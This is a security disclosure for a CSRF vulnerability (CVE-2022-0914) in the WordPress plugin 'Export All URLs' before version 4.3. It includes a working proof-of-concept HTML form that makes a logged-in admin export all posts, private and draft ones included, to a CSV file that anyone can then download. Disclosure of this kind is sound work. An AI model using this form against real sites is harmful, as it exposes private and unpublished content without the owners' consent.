During a security research I found an CSRF vulnerability. The name of the plugin is: Export All URLs , the version of the affected plugin: < 4.3


The plugin does not have CSRF in place when exporting data, which could allow 
attackers to make a logged in admin export all posts and pages 
(including private and draft) into an arbitrary CSV file, 
which the attacker can then download and retrieve the list of titles for example


Make a logged in admin open

    <form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
      <input type="hidden" name="post-type" value="any" />
      <input type="hidden" name="additional-data[]" value="title" />
      <input type="hidden" name="post-status" value="all" />
      <input type="hidden" name="posts-from" value="" />
      <input type="hidden" name="posts-upto" value="" />
      <input type="hidden" name="post-author" value="all" />
      <input type="hidden" name="number-of-posts" value="all" />
      <input type="hidden" name="starting-point" value="" />
      <input type="hidden" name="ending-point" value="" />
      <input type="hidden" name="csv-file-name" value="via-csrf" />
      <input type="hidden" name="export-type" value="text" />
      <input type="hidden" name="export" value="Export Now" />
      <input type="submit" value="Submit request" />

Then open https://example.com/wp-content/uploads/2022/03/via-csrf.CSV as an unauthenticated user

Additional information

WPSCAN link: https://wpscan.com/vulnerability/c328be28-75dd-43db-a5b9-c1ba0636c930


NIST LINK: https://nvd.nist.gov/vuln/detail/CVE-2022-0914

Plugin has more than 30,000+ active installations.